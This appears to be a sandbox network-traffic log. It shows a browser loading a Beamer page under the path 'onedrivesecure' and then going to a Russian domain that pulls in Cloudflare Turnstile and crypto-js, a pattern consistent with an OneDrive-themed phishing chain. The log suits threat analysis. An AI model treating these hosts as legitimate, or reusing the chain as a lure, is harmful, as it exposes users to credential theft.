Source: global trafficHTTP traffic detected: GET /fonts2/Lato-Normal-400b.woff2 HTTP/1.1Host: app.getbeamer.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://app.getbeamer.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://app.getbeamer.com/styles/styles.css?v=3Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: JSESSIONID=nodeaef-default-244--a-v28n108rrpv4riexbncbb2wc3nwa83395383.nodeaef-default-244--a-v28n; _BEAMER_USER_ID_yCPizuyh73191=876d4375-575e-495b-ac98-b2829ba9249f
Source: global trafficHTTP traffic detected: GET /fonts2/Lato-Normal-700b.woff2 HTTP/1.1Host: app.getbeamer.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://app.getbeamer.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://app.getbeamer.com/styles/styles.css?v=3Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: JSESSIONID=nodeaef-default-244--a-v28n108rrpv4riexbncbb2wc3nwa83395383.nodeaef-default-244--a-v28n; _BEAMER_USER_ID_yCPizuyh73191=876d4375-575e-495b-ac98-b2829ba9249f
Source: global trafficHTTP traffic detected: GET /images/beamerIso.png HTTP/1.1Host: app.getbeamer.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://app.getbeamer.com/styles/styles.css?v=3Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: JSESSIONID=nodeaef-default-244--a-v28n108rrpv4riexbncbb2wc3nwa83395383.nodeaef-default-244--a-v28n; _BEAMER_USER_ID_yCPizuyh73191=876d4375-575e-495b-ac98-b2829ba9249f
Source: global trafficHTTP traffic detected: GET /images/logo.svg HTTP/1.1Host: app.getbeamer.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://app.getbeamer.com/styles/public.css?v=f2Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: JSESSIONID=nodeaef-default-244--a-v28n108rrpv4riexbncbb2wc3nwa83395383.nodeaef-default-244--a-v28n; _BEAMER_USER_ID_yCPizuyh73191=876d4375-575e-495b-ac98-b2829ba9249f
Source: global trafficHTTP traffic detected: GET /js/jquery/jquery-3.6.0.min.js HTTP/1.1Host: app.getbeamer.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.getbeamer.com/onedrivesecure/enAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: JSESSIONID=nodeaef-default-244--a-v28n108rrpv4riexbncbb2wc3nwa83395383.nodeaef-default-244--a-v28n; _BEAMER_USER_ID_yCPizuyh73191=876d4375-575e-495b-ac98-b2829ba9249f
Source: global trafficHTTP traffic detected: GET /js/perfect-scrollbar.jquery.min.js HTTP/1.1Host: app.getbeamer.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.getbeamer.com/onedrivesecure/enAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: JSESSIONID=nodeaef-default-244--a-v28n108rrpv4riexbncbb2wc3nwa83395383.nodeaef-default-244--a-v28n; _BEAMER_USER_ID_yCPizuyh73191=876d4375-575e-495b-ac98-b2829ba9249f
Source: global trafficHTTP traffic detected: GET /js/scroll.jquery.js HTTP/1.1Host: app.getbeamer.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.getbeamer.com/onedrivesecure/enAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: JSESSIONID=nodeaef-default-244--a-v28n108rrpv4riexbncbb2wc3nwa83395383.nodeaef-default-244--a-v28n; _BEAMER_USER_ID_yCPizuyh73191=876d4375-575e-495b-ac98-b2829ba9249f
Source: global trafficHTTP traffic detected: GET /js/highlight.pack.js HTTP/1.1Host: app.getbeamer.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.getbeamer.com/onedrivesecure/enAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: JSESSIONID=nodeaef-default-244--a-v28n108rrpv4riexbncbb2wc3nwa83395383.nodeaef-default-244--a-v28n; _BEAMER_USER_ID_yCPizuyh73191=876d4375-575e-495b-ac98-b2829ba9249f
Source: global trafficHTTP traffic detected: GET /images/logo.svg HTTP/1.1Host: app.getbeamer.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /js/emoji.js?v=4 HTTP/1.1Host: app.getbeamer.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.getbeamer.com/onedrivesecure/enAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: JSESSIONID=nodeaef-default-244--a-v28n108rrpv4riexbncbb2wc3nwa83395383.nodeaef-default-244--a-v28n; _BEAMER_USER_ID_yCPizuyh73191=876d4375-575e-495b-ac98-b2829ba9249f
Source: global trafficHTTP traffic detected: GET /images/beamerIso.png HTTP/1.1Host: app.getbeamer.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /js/jquery/jquery-3.6.0.min.js HTTP/1.1Host: app.getbeamer.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /js/mark.min.js HTTP/1.1Host: app.getbeamer.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.getbeamer.com/onedrivesecure/enAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: JSESSIONID=nodeaef-default-244--a-v28n108rrpv4riexbncbb2wc3nwa83395383.nodeaef-default-244--a-v28n; _BEAMER_USER_ID_yCPizuyh73191=876d4375-575e-495b-ac98-b2829ba9249f
Source: global trafficHTTP traffic detected: GET /js/human.js?v=2 HTTP/1.1Host: app.getbeamer.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.getbeamer.com/onedrivesecure/enAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: JSESSIONID=nodeaef-default-244--a-v28n108rrpv4riexbncbb2wc3nwa83395383.nodeaef-default-244--a-v28n; _BEAMER_USER_ID_yCPizuyh73191=876d4375-575e-495b-ac98-b2829ba9249f
Source: global trafficHTTP traffic detected: GET /js/beamer.js?v=4 HTTP/1.1Host: app.getbeamer.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.getbeamer.com/onedrivesecure/enAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: JSESSIONID=nodeaef-default-244--a-v28n108rrpv4riexbncbb2wc3nwa83395383.nodeaef-default-244--a-v28n; _BEAMER_USER_ID_yCPizuyh73191=876d4375-575e-495b-ac98-b2829ba9249f
Source: global trafficHTTP traffic detected: GET /js/perfect-scrollbar.jquery.min.js HTTP/1.1Host: app.getbeamer.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /js/scroll.jquery.js HTTP/1.1Host: app.getbeamer.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /js/highlight.pack.js HTTP/1.1Host: app.getbeamer.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /js/emoji.js?v=4 HTTP/1.1Host: app.getbeamer.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /js/mark.min.js HTTP/1.1Host: app.getbeamer.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /js/human.js?v=2 HTTP/1.1Host: app.getbeamer.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /js/beamer.js?v=4 HTTP/1.1Host: app.getbeamer.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/favicon.ico HTTP/1.1Host: app.getbeamer.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://app.getbeamer.com/onedrivesecure/enAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: JSESSIONID=nodeaef-default-244--a-v28n108rrpv4riexbncbb2wc3nwa83395383.nodeaef-default-244--a-v28n; _BEAMER_USER_ID_yCPizuyh73191=876d4375-575e-495b-ac98-b2829ba9249f
Source: global trafficHTTP traffic detected: GET /images/resource-loading.gif HTTP/1.1Host: app.getbeamer.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://app.getbeamer.com/onedrivesecure/enAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: JSESSIONID=nodeaef-default-244--a-v28n108rrpv4riexbncbb2wc3nwa83395383.nodeaef-default-244--a-v28n; _BEAMER_USER_ID_yCPizuyh73191=876d4375-575e-495b-ac98-b2829ba9249f
Source: global trafficHTTP traffic detected: GET /images/favicon.ico HTTP/1.1Host: app.getbeamer.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/resource-loading.gif HTTP/1.1Host: app.getbeamer.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/social/share.svg HTTP/1.1Host: app.getbeamer.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://app.getbeamer.com/styles/styles.css?v=3Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _BEAMER_USER_ID_yCPizuyh73191=876d4375-575e-495b-ac98-b2829ba9249f; JSESSIONID=nodeaef-default-244--a-v28n108rrpv4riexbncbb2wc3nwa83395383.nodeaef-default-244--a-6qtf
Source: global trafficHTTP traffic detected: GET /pictures?id=458662-77-9a--_ve-_vVfvv70WFe-_vSrvv703Eu-_vX0c77-9TgVq77-977-9Xe-_ve-_vUzvv73vv73vv71F77-9&v=4 HTTP/1.1Host: app.getbeamer.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://app.getbeamer.com/onedrivesecure/enAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _BEAMER_USER_ID_yCPizuyh73191=876d4375-575e-495b-ac98-b2829ba9249f; JSESSIONID=nodeaef-default-244--a-v28n108rrpv4riexbncbb2wc3nwa83395383.nodeaef-default-244--a-6qtf
Source: global trafficHTTP traffic detected: GET /loadMoreNews?app_id=yCPizuyh73191&language=EN&user_id=876d4375-575e-495b-ac98-b2829ba9249f&publicPage=true&post=false&basePath=https%3A%2F%2Fapp.getbeamer.com%2Fonedrivesecure%2Fen HTTP/1.1Host: app.getbeamer.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/social/share.svg HTTP/1.1Host: app.getbeamer.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pictures?id=458662-77-9a--_ve-_vVfvv70WFe-_vSrvv703Eu-_vX0c77-9TgVq77-977-9Xe-_ve-_vUzvv73vv73vv71F77-9&v=4 HTTP/1.1Host: app.getbeamer.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: JSESSIONID=nodeaef-default-244--a-v28n1l5igqirr9geu1p4rwytj8bi273395551.nodeaef-default-244--a-v28n
Source: global trafficHTTP traffic detected: GET /n682ZHUO/?utm_source=beamer&utm_medium=standalone&utm_campaign=Stillwell-Hansen-Thermal-Parts&utm_content=textlink HTTP/1.1Host: wxxi.deripaud.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://app.getbeamer.com/onedrivesecure/enAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://wxxi.deripaud.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://wxxi.deripaud.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://wxxi.deripaud.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/672eb098a9f3/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://wxxi.deripaud.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/672eb098a9f3/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/egw9b/0x4AAAAAAA3OmVPC4MkMilKk/auto/fbE/new/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://wxxi.deripaud.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=905a5214bea60fa5&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/egw9b/0x4AAAAAAA3OmVPC4MkMilKk/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
